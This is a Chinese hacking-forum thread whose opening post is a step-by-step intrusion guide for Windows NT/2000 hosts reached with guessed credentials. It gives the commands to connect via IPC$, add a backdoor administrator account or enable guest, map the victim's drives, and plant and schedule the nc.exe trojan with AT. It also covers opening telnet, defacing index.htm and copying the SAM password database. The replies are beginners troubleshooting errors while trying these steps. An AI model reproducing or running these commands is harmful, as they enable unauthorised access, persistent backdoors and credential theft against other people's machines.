论坛: 菜鸟乐园 标题: 入侵的几个必备命令 复制本贴地址    
作者: jyt [jyt]    论坛用户   登录
如果你在用流光或者猜密码猜到USER和PASS的话你将怎么办,请看下面的详细经过:
.假如你用流光扫描了一段IP其中的一个IP127.0.0.1(对方开着21).并且USER和PASS的话.

.net use  \\127.0.0.1\ipc$   "PASS" /user:"user" (这是和对方链接)

.显示成功的话接着来.

.net user user1 pass1/add(这里是创建一个USER为USER1和PASS为PASS1.

如果显示成功的话把它加入ADMINISTRATORS

.net localgroup Administrators user1 /add(如果显示不成功那么激活GUEST)

.net user guest  /active:yes(GUEST绝对可以我在自己的NT机器上用过删除不掉GREST这是WINDOWS200/NT的一个用户).

.Net user guest pass2(给GUEST设置一个密码.)

.net use d:\\127.0.0.1\c$(如果对方服务器的盘为D那么把对方的D映射为自己的C).

.cp a:\nc.exe  c:\(这是把NC木马拷到方的服务器上做肉鸡以免以后入侵).

用AT命令运行木马,NC一般打开的端口是99.

.AT \\127.0.0.1 4:00 NC.EXE

运行之前先查看对方的时间.

.NET TIME \\127.0.0.1 

显示  3:58

二:用TELNET链接.

.如果你安装了木马(NC.EXE)

1:先运行 NET START TELNET (这是必须进入对方主机为第二次入侵作打算).

2:TELNET 127.0.0.1 80

三:

1:运行-FTP 127.0.0.1

输出入USER和PASS

2:映射对方盘(前面说过)

4:CP INDEX.HTM \\127.0.0.1\C$\INDEX.HTML

5:NT数据备份在WINNT\REPAIR\ASM._SAM._数据名把127.0.0.1数据库复制到本地C:

CP \\127.0.0.1\ADMIN$\REPAIR\SAM._ C:\



地主 发表时间: 03/27 00:54

回复: koala [koala]   论坛用户   登录
USER和PASS是什么请告诉我

B1层 发表时间: 03/29 12:33

回复: helpme [helpme]   论坛用户   登录
晕!~~你的E文怎么这么烂?user是用户名,pass是密码.OK ?and stand??

B2层 发表时间: 03/29 13:52

回复: yoda [yoda]   论坛用户   登录
请问$通常指什么?

B3层 发表时间: 03/30 20:43

回复: ooo [ooo]   论坛用户   登录


B4层 发表时间: 03/30 21:00

回复: ltb [ltb]   论坛用户   登录






[此贴被 亲身体会(ltb) 在 03月30日21时49分 编辑过]


[此贴被 亲身体会(ltb) 在 03月30日21时12分 编辑过]

B5层 发表时间: 03/30 21:07

回复: licanfeng [licanfeng]   论坛用户   登录
我用at命令让那个程序执行的时候老是说拒绝执行,这该怎么解决??
我的那个用户已经是管理员权限了,执行时间也设好了。

B6层 发表时间: 03/31 13:12

回复: licanfeng [licanfeng]   论坛用户   登录
.net use d:\\127.0.0.1\c$(如果对方服务器的盘为D那么把对方的D映射为自己的C).

如何知道人家的的服务器盘呢??
一个个试吗?

B7层 发表时间: 03/31 13:46

回复: daviy [daviy]   论坛用户   登录
net use d:\\127.0.0.1\c$(如果对方服务器的盘为D那么把对方的D映射为自己的C).
这一补“系统发生67错误。找不到网络名”
  这怎么办?

B8层 发表时间: 03/31 14:19

回复: vishx [vishx]   论坛用户   登录
67错误,可能对方没开IPC

B9层 发表时间: 03/31 19:36

回复: bear2000 [bear2000]   论坛用户   登录
net use d:\\127.0.0.1\c$系统说发生错误85,设备已在使用中,怎么办?

B10层 发表时间: 04/04 08:26

回复: max_ax [max_ax]   论坛用户   登录
我用net use  \\127.0.0.1\ipc$   "PASS" /user:"user
可显示说已断开啊
以前是ok
我用了net use  \\127.0.0.1\ipc$   /delte
以后怎么也连不上了啊????

B11层 发表时间: 04/11 20:11

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号